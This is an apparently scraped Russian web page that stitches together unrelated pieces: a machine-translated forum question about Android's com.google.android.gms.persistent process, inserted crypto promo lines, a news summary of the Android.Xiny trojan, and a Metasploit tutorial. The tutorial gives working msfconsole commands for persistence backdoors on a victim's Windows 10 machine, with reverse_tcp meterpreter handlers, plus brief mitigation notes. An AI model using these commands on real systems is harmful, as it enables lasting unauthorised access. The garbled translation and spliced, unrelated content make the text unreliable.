Даже когда ничего не происходит, этот системный процесс, похоже, использует устойчивую 1-2% от CPU. В течение дня это истощает значительное количество батареи, даже если устройство не использовалось ни для чего. Я не смог сопоставить его с другими приложениями, потому что даже когда они использовали только несколько секунд времени процессора каждый в течение нескольких часов, этот процесс использует минуты.
Он все еще работает, даже если я:
- отключить WiFi
- отключить BlueTooth
- отключить службы определения местоположения
- отключить все, кроме минимальной синхронизации (например, GMail)
Я написал небольшое тестовое приложение, которое отслеживает /proc//stat каждые 10 мс и записывает в logcat в любое время com.google.android.gms.persistent , надеясь, что он напишет что-то для логарифма, который бы точно определял, какое приложение или другая служба использует “постоянный” для своего Сервисы. Я не вижу многого, но вот несколько вещей, которые я видел:
Концепция Liquid Staking Derivatives в Persistence 🙇🏼♂️Тренд LSD ⚖️
InputReader: Reconfiguring input devices. changes=0x00000010 WifiService: acquireWifiLockLocked: WifiLock LocationFilter: Forcing stable location. Original location:Location[. ConnectivityService: notifyType CAP_CHANGED for NetworkAgentInfo [WIFI () — 246]
Каждая строка выше была в другое время, непосредственно предшествующее (в течение 10 мс) сообщение журнала, определяющее использование ЦП с помощью com.google.android.gms.persistent , но без какой-либо четкой индикации того, связано ли это. К сожалению, ни один из вышеприведенных отчетов не превышает 10 мс времени процессора, и поэтому – даже если точное обозначение того, что использует “постоянный”, представляет собой лишь небольшую часть используемого времени процессора.
Другие попытки исследования того, что использует этот процесс, предложили различные вещи (например, носимые), которых у меня нет, и никогда не подключались к моему устройству.
Что такое этот процесс? Я ищу эту информацию напрямую, или для дополнительных способов я могу вывести эту информацию, подобную моим попыткам с помощью logcat.
Обновление: я искал источник (например, com.google.android.gms.persistent.java или что-то в этом роде) на https://android.googlesource.com без везения. Разве это не часть общедоступного исходного кода? Что действительно странно, так это то, что даже не существует какой-либо документации, например. здесь: https://android.googlesource.com/platform/frameworks/base/+/33fca8e/docs/html/reference/com/google/android/gms
Обновление 2: я отключил все синхронизации в разделе “Настройки” → “Аккаунты”. Это, по-видимому, снижает загрузку процессора немного больше, и падение батареи, кажется, упало до обхода – за исключением периодически com.google.android.gms.persistent все еще, кажется, занимает пакет CPU.
Моя рабочая теория теперь заключается в том, что она имеет тревогу, которая срабатывает примерно через 60 секунд независимо от того, нужна она или нет, и этот код проверяет работу синхронизации, и если ничего не нужно синхронизировать, он отказывается от и сразу же перейдет в режим ожидания. Тем не менее, я на полпути не могу поверить, что такой ужасный дизайн будет использоваться, поскольку все, что просыпает процессор каждую минуту, обязательно разряжает батарею намного быстрее, даже если она просто заснет и почему будет использоваться опрос вместо чего что-то прерывается для синхронизации в любом случае?
Полноценный обзор взаимодействия с Dexter Zone от Persistence 🖥Участие в розыгрыше 8000 $XPRT 🪂
Насколько я могу судить (из-за того, что не смог найти его), исходный код для com.google.android.gms.persistent не является открытым исходным кодом или доступен в Интернете в любом месте. Если я ошибаюсь, я бы принял в качестве ответа на мой вопрос, любой ответ, который будет указывать на исходный код, поскольку я мог бы просмотреть его и определить для себя, почему использование ЦП.
Последний член известной семьи троянских программ для Android и запускает вредоносные приложения без знаний пользователя о зараженных устройств, по словам исследователей российской антивирусной фирмы Dr Web.
Вредоносная программа, известная как “Android.Xiny.60”, родом из того же семейства, что и Android.Xiny.19.origin, который сделал свой большой вход в январе 2016.
В то время Xiny скрылся в более чем 60 играх, доступных для скачивания из официального магазина Google Play и использовали инструкции, он в виде файлов изображений, модифицированных стеганографией для запуска произвольные файлы APK.
Зараженные андроид игры
Как сообщает Softpedia, в последних версиях Xiny-трояна нет необходимо обмануть пользователей в предоставлении ему admin privilges, но вместо этого развертывать эксплойты для root-устройства.
После запуска вредоносного ПО он загружает свои вредоносные компоненты и сохраняет их в системных каталогах. Троян может использовать эти элементы, которые могут вызвать любые неприятности.
Например, Xiny может внедрять вредоносные процессы в приложения чата, отслеживание разговоров и даже отправка сообщений без разрешение.
Кроме того, вредоносное ПО предназначено для банковских приложений и может отображать поддельные страницы входа, чтобы украсть имена пользователей и пароли.
Как объясняет доктор Веб в сообщении в блоге:
“Троян запускает модуль igpi (Android.Xiny.61), который использует Функция ptrace для установки исполняемой библиотеки Linux igpld.so(Android.Xiny.62) в системные процессы Google Play (com.android.vending) и сервисы Google Play (com.google.android.gms, co.google.android.gms.persistent) приложения”.
Вредоносная программа может также ввести Android.Xiny.62 в zygote, что важно Процесс Android, чья зараженность позволяет трояну запускать новый приложений и дополнительных вредоносных программ. В то же время, Android.Xiny.60 ожидает обнаружения зарядного устройства, главного экрана для включения или выключения, или нескольких других конкретных событий. Всякий раз, когда один из тех события происходят, троян соединяется с сервер управления и отправки всех видов информации о устройство на домашнюю базу.
Пользователи Android должны работать, чтобы защитить себя от всех версий от вредоносного ПО Android.Xiny, поддерживая современный антивирус решение, чтение обзоров приложений перед их установкой и чтобы убедиться, что приложение запрашивает разрешения jives с его рекламируемой цели.
Немногие, если какие-либо законные приложения действительно требуют прав root, так что будьте осторожны мошенников, ищущих права, которых они не заслуживают
Это не вирус или троян. это игровой сервис Google Play, который должен правильно запускать сервисы Google Play в платформе Android. На самом деле это основной процесс, выполняемый в фоновом режиме, полезно поддерживать приложения и связывать их с магазином воспроизведения Google, а также обновлять их и предоставлять другие функции службы воспроизведения Google. Что касается использования ЦП, многие другие приложения тоже работают во фонов и берут ресурсы, но они предназначены для обновления и предоставления вам более эффективных услуг реального времени.
Источник: techarks.ru
Несколько способов создания Persistence в Windows 10 с помощью Metasploit
Слово Persistence может переводиться как постоянный , поэтому в этой статье приведены несколько методов создания постоянного backdoor на компьютере жертвы.
Поскольку для получения доступа к любой системе требуется провести много тяжелой работы, и как только система успешно захвачена, пользователю нужно еще время для дальнейшего ее изучения, существует риск, что жертва может выключить свой компьютер или изменить учетные данные. Вот почему поддержание доступа является важным этапом пентестинга. Персистентность включает в себя методы, которые помогают человеку сохранить доступ к системе и получить измененные учетные данные при необходимости.
Предварительные данные:
ОС жертвы: Windows 10
ОС пользователя: Kali Linux (Metasploit Framework)
Примечание : для создания персистентного backdoor у пользователя должна быть скомпрометированная машина жертвы с включенным сеансом meterpreter, чтобы выполнить все действия, перечисленные в этой статье.
Методы получения персистентности с помощью Metasploit
Пора начинать: система жертвы уже была скомпрометирована и запущен сеанс meterpreter на правах администратора. Теперь пользователь хочет установить постоянный бэкдор в системе жертвы, который обеспечит обратное соединение при необходимости.
Служба персистентности
Этот модуль будет генерировать и загружать исполняемый файл на удаленный хост, а затем сделает его постоянным сервисом. Будет создана новая служба, которая запускает полезную нагрузку всякий раз, когда это необходимо. Требуются привилегии администратора.
Таким образом, пользователь введет следующие команды на своем Kali Linux для запуска упомянутого модуля:
use exploit/windows/local/persistence_service
set session 2
set lport 5678
exploit
Вышеупомянутый модуль, который будет генерировать и загружать исполняемый файл в систему жертвы под каталогом / temp как «lVFC.exe», и сделает его службой персистентности.
Если жертва перезагрузит систему, предыдущий сеанс meterpreter будет окончен. Теперь необходимо настроить мультиобработчик с помощью следующих команд для запуска полезной нагрузки:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.115
set lport 5678
exploit
Как только система жертвы будет запущена, пользователь автоматически получит сеанс meterpreter.
Когда компьютер запускается автоматически, некоторые из его служб работают по умолчанию, поэтому эксплойт persistence_service создает новую службу, которая будет активировать полезную нагрузку всякий раз, когда это необходимо. На приведенном ниже рисунке можно увидеть, что исполняемый файл IVFC.exe работает под именем пользователя системы. Надо проверить путь этого файла:
Метод митигирования для эксплойта persistence_service
Прежде всего, следует определить незнакомые файлы, которые уже запущены, а затем остановить исполняемый файл, т.е. IVFC.exe и удалить его из каталога temp.
Persistence_exe
Это второй способ сохранить доступ к компьютеру жертвы. В этом скрипте уже был получен сеанс meterpreter компьютера жертвы, и есть доступ пользователя.
Этот модуль загрузит исполняемый файл в систему жертвы и сделает его персистентным. Он может быть установлен как пользователь, система или служба. В данном этот модуль будет задействован с помощью сеанса 1 (уже скомпрометированного) и установки rexpath (удаленного исполняемого пути). Этот файл полезной нагрузки будет создан на компьютере жертвы пользователем, но из-за скрипта персистентности он будет сохранен в каталоге temp с именем default.exe (его можно изменить). Нужно установить файл в меню задач автозапуска по пути реестра, указанному на рисунке ниже.
Для запуска этого модуля надо ввести следующие команды:
use post/windows/manage/persistence_exe
set session 1
set rexepath /root/payload.exe
exploit
После успешного запуска модуля пользователь должен настроить мультиобработчик с помощью следующей команды:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.115
set lport 1234
exploit
Как только жертва перезагрузит свой компьютер и войдет в систему, пользователь автоматически получит сеанс meterpreter.
На приведенном ниже рисунке можно увидеть функцию persistence_exe, которая создает службу автозапуска:
HKCU/software/microsoft/windows/currentversion/run/FOCxoPAO
Сервис начнет работать, как только компьютер жертвы запустится. Файл по умолчанию создается в каталоге temp.
Метод митигирования для Persistence_exe
Во-первых, нужно удалить запись из редактора реестра по пути:
HKCU/software/microsoft/windows/currentversion/run/FOCxoPAO
А затем удалить исполняемый файл полезной нагрузки из каталога temp и перезагрузить систему.
Реестр персистентности
Реестр является основной частью Windows и содержит избыток необработанных данных. Злоумышленники любят выбирать места реестра Windows для подключения к системе жертвы, чтобы файлы или коды не могли быть обнаружены сканированием на предмет подозрительных действий.
Этот модуль установит полезную нагрузку, которая выполняется во время загрузки компьютера. Она будет происходить либо при входе пользователя в систему, либо при запуске системы через значение реестра в разделе “CurrentVersionRun” (в зависимости от привилегий и выбранного метода). Полезная нагрузка будет полностью находиться в реестре.
Поскольку компьютер жертвы уже был скомпрометирован и получен сеанс meterpreter, необходимо использовать следующую команду для выполнения сохраняемости реестра.
use exploit/windows/local/registry_persistence
set session 1
set lport 7654
exploit
После выполнения эксплойта он будет создавать ключ реестра в разделе HKCUsoftwarewl4cN9w:
Если жертва перезагружает систему, сеанс meterpreter будет отключен. Для получения сеанса снова, следует просто установить полезную нагрузку мультиобработчика и выполнить ее.
use exploit/multi/handler
set set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.115
set lport 7654
exploit
Как только компьютер жертвы запустится, и человек войдет в систему, автоматически будет получен meterpreter из-за сценария автозапуска в реестре, который был установлен злоумышленником. Registry _persistence успешно выполняется.
С помощью приведенного ниже изображения можно проверить путь раздела реестра, созданного эксплойтом registry_persistence.
Источник: dzen.ru